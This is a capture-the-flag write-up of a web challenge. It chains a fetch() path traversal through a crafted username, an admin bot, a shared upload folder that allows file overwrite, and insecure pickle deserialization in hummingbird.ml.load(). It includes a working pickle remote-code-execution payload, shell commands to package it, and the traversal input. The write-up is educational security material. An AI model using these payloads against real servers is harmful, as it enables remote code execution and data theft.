This interesting challenge only had 13 solves by the end of the event, and I managed to get first blood 🩸! The goal was clear from the beginning, but most of my time went into one small part until it finally clicked.

The Challenge



We got the full source code and even a Docker setup for this challenge, making it easy to test locally. When visiting the web page, we can register an account and log in to access the dashboard.

It offers some interesting functionality: uploading and managing files, changing your profile, and reporting a profile to a bot.

On the /profile page we can view our username and register date, as well as a button labelled 'Visit My Profile'. After clicking it and waiting a few seconds, we are brought to /profile/2 with the message "Bot successfully reported", so the bot has likely just visited our profile. We can confirm this in the code: the /profile/visit route in routes/routes_user.py hands our user ID to the bot in utils/bot.py.

Every time we press this button, the bot logs into the admin account and visits the profile we give it. Note that the user_id variable is parsed into an int, so we cannot inject an arbitrary path here.
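The int() conversion is what blocks path injection here. Below is a minimal sketch of that kind of check. The helper name build_profile_url and the base URL are hypothetical, because the original route code is not reproduced in this write-up. The sketch only mirrors the int() parsing described above.

```python
def build_profile_url(base_url: str, user_id: str) -> str:
    """Hypothetical helper mirroring the int() parsing of user_id."""
    # int() only accepts integer literals, so path-like input such as
    # "../model/load/1" raises ValueError before any URL is built.
    profile_id = int(user_id)
    return f"{base_url}/profile/{profile_id}"


if __name__ == "__main__":
    base = "http://localhost:5000"  # hypothetical local instance
    print(build_profile_url(base, "2"))
    try:
        build_profile_url(base, "../model/load/1")
    except ValueError as exc:
        print("rejected:", exc)
```

Any path we might want the bot to visit fails at int(), so this endpoint only ever points the bot at a numeric profile.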

The view that is loaded for the admin looks like this:

```jinja
{% include "./partials/head.html" %}
{% include "./partials/sidebar.html" %}
{% include "./partials/flash.html" %}

Profile #{{ user.id }}
Username: {{ user.username }}
Status: Loading...
Register date: {{ user.register_date }}

{% include "./partials/bottombar.html" %}
{% include "./partials/footer.html" %}
```

Interacting with the Bot

The template above uses no Jinja2 |safe filters. HTML is therefore always escaped to entities, and we cannot simply get Cross-Site Scripting (XSS) through our username, for example. However, there is another interesting context: the <script> tag. Jinja2's autoescaping is not context-aware. It might miss characters that matter in JavaScript, such as ' single quotes, which would let us break out of the fetch() string and start writing our own JavaScript.

Note: While solving this challenge, I assumed this would be an easy XSS vector without testing it. I went off writing a whole JavaScript payload without once checking whether I actually had XSS. As you'll read below, always test your theories!

If single quotes were not escaped, a payload like '-alert()-' would let us run our own JavaScript. Unfortunately, when we test it, we find that they are correctly escaped:

Output: `&#39;-alert()-&#39;`

Too bad: we cannot break out of the JavaScript string to get XSS. One thing we might still abuse later is that characters like /, . and ? are left untouched. Our input therefore lands in the fetch() URL path as-is, and with directory traversal we can point this request at any other page that might be useful. The response isn't used for anything, but the authenticated GET request itself might trigger something.
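This behaviour can be reproduced without a browser. The sketch below re-implements, in plain Python, the replacement table that Jinja2's autoescaping uses through MarkupSafe. It renders the result into a hypothetical fetch() line. The '/profile/<username>/is_logged' URL shape is an assumption inferred from the exploit at the end of this write-up, not the challenge's verbatim template. Quotes become entities, which are not decoded back inside a <script> element, while ../ and ? pass through untouched.

```python
# The characters MarkupSafe escapes when Jinja2 autoescaping is on.
HTML_ESCAPES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    "'": "&#39;",
    '"': "&#34;",
}


def autoescape(value: str) -> str:
    """Escape HTML-special characters one character at a time."""
    return "".join(HTML_ESCAPES.get(ch, ch) for ch in value)


def render_fetch_line(username: str) -> str:
    # Hypothetical template line; only the escaping behaviour matters here.
    return f"fetch('/profile/{autoescape(username)}/is_logged')"


if __name__ == "__main__":
    # The quote is neutralised, so we cannot leave the JS string.
    print(render_fetch_line("'-alert()-'"))
    # Path characters survive, so the request path can be redirected.
    print(render_fetch_line("../model/load/1?"))
```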

Insecure Deserialization by Design

Another page to look at is the Uploads section, where we can upload .zip files (and only .zip files). The upload route checks that the extension is `.zip`, saves the file to a shared folder, and adds its path to the database.



Uploaded files can later be listed via /files. They are stored in /app/uploads, which is outside the exposed web root (only /app/src/assets is served). After uploading, we can only edit or delete a file, and neither action does anything particularly interesting.

In the UI that lists our files, however, there is another button called 'Load'. When we click it, an error message is displayed:

You need to be an admin to access this page.

This triggers the /model/load/2 endpoint defined in the routes_admin.py file. The endpoint seems to load the uploaded ZIP file with hummingbird.ml.load(). However, a decorator enforces that admin access is required.
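An admin check like this could look like the framework-free sketch below. The session dictionary, the ADMIN_USER_ID constant and the load_model view are hypothetical stand-ins. The only details taken from the challenge are that user_id 1 is the admin and that other users get the error message shown above.

```python
from functools import wraps

ADMIN_USER_ID = 1  # the admin account has user_id 1
FORBIDDEN = "You need to be an admin to access this page."


def admin_required(view):
    """Reject the request unless the session belongs to the admin."""

    @wraps(view)
    def wrapper(session: dict, *args, **kwargs):
        if session.get("user_id") != ADMIN_USER_ID:
            return FORBIDDEN
        return view(session, *args, **kwargs)

    return wrapper


@admin_required
def load_model(session: dict, file_id: int) -> str:
    # Hypothetical stand-in for the real /model/load/<id> view.
    return f"loading model {file_id}"


if __name__ == "__main__":
    print(load_model({"user_id": 2}, 2))  # our account
    print(load_model({"user_id": 1}, 1))  # the admin (e.g. the bot)
```

The check depends only on who is logged in. A request made from the admin's browser passes, no matter who caused it to be sent.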

We cannot make our user_id equal to 1, so we cannot access the endpoint ourselves. Still, let's explore this idea, because maybe the admin can access it for us later. The function in question is load() from the hummingbird.ml library for Machine Learning models. Maybe it has some dangerous behaviour we can exploit with an arbitrary ZIP file.

In Visual Studio Code, we can write a small test script and set a breakpoint on the load() call. This lets us step into it and see exactly what happens:

```python
import hummingbird.ml
hummingbird.ml.load("rce.zip")  # <-- Set a breakpoint by clicking the red dot on this line
```

Then we can start the debugger from the Run and Debug tab on the left, which asks us to create a launch.json file. Here we choose the Python Debugger template and then Python File. This opens a JSON file where we can specify debugging options. Importantly, VS Code does not step into library code by default. Library code is exactly what we're interested in, so we have to enable it with "justMyCode": false:

```jsonc
{
  "version": "0.2.0",
  "configurations": [
    {
      "name": "Python Debugger: Current File",
      "type": "debugpy",
      "request": "launch",
      "program": "${file}",
      "console": "integratedTerminal",
      "justMyCode": false // added: also step into library code
    }
  ]
}
```

Finally, with our test script open, we press the green run button in the debugger. Execution should pause at the load() call, letting us step in and follow the whole flow while inspecting local variables. The first function we land in looks like this:

```python
...
# Unzip the dir.
...
# Verify the digest if provided.
...
# Load the model type.
...
```

Using shutil.unpack_archive(), our ZIP file is unpacked into a directory with the same name minus .zip. Then the file at constants.SAVE_LOAD_MODEL_TYPE_PATH inside that directory is read, and its contents are compared to various model types. Because we are running in the debugger, we can simply step to where this constant is used and read its value at runtime: 'model_type.txt'.
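These first steps can be imitated with the standard library alone. This is not hummingbird's code. read_model_type is a hypothetical helper: it unpacks an archive into a sibling directory named after the archive minus .zip, then reads model_type.txt from that directory. That file is all we need to control which branch load() takes.

```python
import os
import shutil
import tempfile
import zipfile


def read_model_type(zip_path: str) -> str:
    """Unpack zip_path into a sibling directory and read model_type.txt."""
    location = zip_path[: -len(".zip")]  # "x/rce.zip" -> "x/rce"
    shutil.unpack_archive(zip_path, location, format="zip")
    with open(os.path.join(location, "model_type.txt")) as f:
        return f.readline()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        zip_path = os.path.join(tmp, "rce.zip")
        with zipfile.ZipFile(zip_path, "w") as zf:
            zf.writestr("model_type.txt", "torch")
        print(read_model_type(zip_path))
```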

If we include this file in our ZIP, we control which model type is used. Let's see where each option leads, starting with torch:

```python
...
# Load the model type.
...
# Check the versions of the modules used when saving the model.
...
# This is a torch.jit model
...
# This is a pytorch model
...
```

It reads the model type from the same file again and compares it to "torch.jit" or "torch". Then, bingo! It loads our file with pickle.load(). pickle is an infamous serialization module that is vulnerable to insecure deserialization when it loads untrusted data. Stepping through to this point, we find that constants.SAVE_LOAD_TORCH_JIT_PATH is equal to 'deploy_model.zip'.
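Why is pickle.load() on attacker-controlled data so dangerous? When an object defines __reduce__, pickle stores a callable plus its arguments, and unpickling simply calls that callable. The sketch below shows that the call really happens during loading. It uses the harmless builtin len instead of a shell command, and the class name Gadget is made up for illustration.

```python
import pickle


class Gadget:
    def __reduce__(self):
        # Tell pickle: "to rebuild me, call len('hello')".
        return (len, ("hello",))


if __name__ == "__main__":
    blob = pickle.dumps(Gadget())
    # Loading never recreates a Gadget; it calls len("hello") instead.
    print(pickle.loads(blob))
```

Swap len for os.system and "hello" for a shell command, and the same mechanism gives code execution. This is exactly how a pickle RCE payload works.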

If we write a pickle Remote Code Execution payload to that location, it should be loaded and our code executed. Let's create a simple script that does this:

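```python
import os
import pickle
class RCE:
    def __reduce__(self):
        return (os.system, ("id",))  # runs `id` when unpickled
os.makedirs("rce", exist_ok=True)
with open("rce/deploy_model.zip", "wb") as f:
    pickle.dump(RCE(), f)
```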

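We prepare this in a directory called rce/. It must also contain a file named 'model_type.txt' with exactly the content torch, not even a trailing newline. Then we zip the directory's contents so that both files sit at the root of the archive:

```shell
printf 'torch' > rce/model_type.txt
(cd rce && zip ../rce.zip model_type.txt deploy_model.zip)
```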
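If you prefer to stay in Python, the archive can also be built with zipfile. build_model_zip is a hypothetical helper. It writes model_type.txt with exactly "torch" (no newline) and the pickled payload as deploy_model.zip, both at the archive root. That way they land directly inside the extracted directory. The payload is passed in as bytes, so any pickle you generated can be used.

```python
import pickle
import zipfile


def build_model_zip(zip_path: str, payload: bytes) -> None:
    """Write an archive with model_type.txt and deploy_model.zip at its root."""
    with zipfile.ZipFile(zip_path, "w") as zf:
        # Exactly "torch": no trailing newline.
        zf.writestr("model_type.txt", "torch")
        # Raw pickle bytes that the "torch" branch hands to pickle.load().
        zf.writestr("deploy_model.zip", payload)


if __name__ == "__main__":
    # Harmless placeholder payload; swap in your own pickle bytes.
    build_model_zip("rce.zip", pickle.dumps({"placeholder": True}))
```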

If we now load rce.zip with our test script, we see the output of the 'id' command!

uid=1001()) groups=1001()

We successfully crafted a ZIP file that when loaded, will run arbitrary commands on the server. Now we still need to figure out how exactly to trigger it.

Note: For some reason, the highly unsafe pickle module has become almost a standard for sharing Machine Learning models. As a result, load functions like this one are often vulnerable to insecure deserialization.

Triggering the Admin

One idea is to upload our ZIP to the application, then make the bot view our profile so that it fetches the load URL through the path traversal we found earlier. There is one problem with this, though: the /model/load endpoint only allows loading a model owned by the current user:

```python
# Notice the `user_id=` filter here
...
```
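The effect of that user_id filter can be sketched with an in-memory SQLite table. The files schema, the find_file helper and the sample rows are all hypothetical. The point is that a lookup keyed on both the file ID and the current user's ID returns nothing for files you don't own, even when you know their ID.

```python
import sqlite3
from typing import Optional


def find_file(db: sqlite3.Connection, file_id: int, user_id: int) -> Optional[str]:
    """Return the stored path only if file_id belongs to user_id."""
    row = db.execute(
        "SELECT path FROM files WHERE id = ? AND user_id = ?",
        (file_id, user_id),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE files (id INTEGER PRIMARY KEY, user_id INTEGER, path TEXT)")
    db.executemany(
        "INSERT INTO files VALUES (?, ?, ?)",
        [(1, 1, "/app/uploads/admin_model.zip"), (2, 2, "/app/uploads/rce.zip")],
    )
    print(find_file(db, 2, 2))  # our own upload: found
    print(find_file(db, 1, 2))  # the admin's file, requested by us: None
```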

This ruins our plan: how would we get our model onto the admin's account? With Cross-Site Scripting, we could potentially make the admin upload a model and then load it. But we don't have an XSS vulnerability, and it doesn't seem possible to get one on any other page either.

There aren't many other interesting pages we can fetch either. Uploading a file requires a POST request, while the fetch() call sends a GET request, so we cannot get the admin to upload our malicious file to their account.



This took me a long time to find. After logging in as the administrator on my local Docker instance, I noticed that the admin's file list contains one default example file.

The admin can load this file, and it seems to be the only file that can be loaded. Now here comes the trick: all files are uploaded to the same shared folder. So why not overwrite example_model.zip with our malicious payload and then load it?
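The trick works because uploads are stored by filename in one directory shared by all users. Below is a minimal sketch under that assumption. save_upload and the filename model.zip are hypothetical, and whether the real handler sanitises names is not covered here. Two users uploading the same name write to the same path, so a database entry created earlier now points at the newer bytes.

```python
import os
import tempfile


def save_upload(upload_dir: str, filename: str, data: bytes) -> str:
    """Store an upload in the shared folder, keyed only by its filename."""
    if not filename.endswith(".zip"):
        raise ValueError("only .zip files are accepted")
    path = os.path.join(upload_dir, filename)
    with open(path, "wb") as f:  # "wb" silently replaces an existing file
        f.write(data)
    return path


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as uploads:
        admin_path = save_upload(uploads, "model.zip", b"benign model")
        our_path = save_upload(uploads, "model.zip", b"malicious model")
        print(admin_path == our_path)
        with open(admin_path, "rb") as f:
            print(f.read())
```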

This way we upload the file from our own account, which is allowed, while the admin's entry still points to the same path that we just overwrote. We rename our local rce.zip to example_model.zip. We also make the payload more useful: instead of just running 'id', it extracts the flag to a publicly reachable file.

After zipping this again as example_model.zip, we upload it through the UI as normal, and it responds with 'File successfully uploaded'.

Next, we need to make the admin load the example model stored at ID 1. This is easy with our fetch() path traversal from earlier:

If a username is set to ../model/load/1?, the ../ cancels out the leading /profile/ segment. The trailing /is_logged part becomes a query string, which is ignored. We register an account with exactly this username.

The final step is to make the admin visit this profile by requesting /profile/visit. After it responds with 'Bot successfully reported', we should find the flag extracted at /static/flag.txt!
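The path trick can be checked with urllib.parse.urljoin, which resolves "." and ".." segments the way a browser does for a simple case like this. It is a stand-in, not the browser's actual URL parser. The host and the '/profile/<username>/is_logged' shape of the fetched URL are assumptions based on the description above.

```python
from urllib.parse import urljoin, urlsplit

# Hypothetical origin and profile page the bot is viewing.
PAGE = "http://localhost:5000/profile/2"
USERNAME = "../model/load/1?"

# The template splices the (HTML-escaped, but unchanged) username into the path.
fetched = urljoin(PAGE, f"/profile/{USERNAME}/is_logged")
parts = urlsplit(fetched)

print(fetched)
print("path: ", parts.path)
print("query:", parts.query)
```

The resolved path is /model/load/1, and /is_logged ends up in the query string, where the load endpoint ignores it.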

GCC{0d4y_1n_d353r14l1z4710n_4r3_n07_7h47_h4rd_70_f1nd}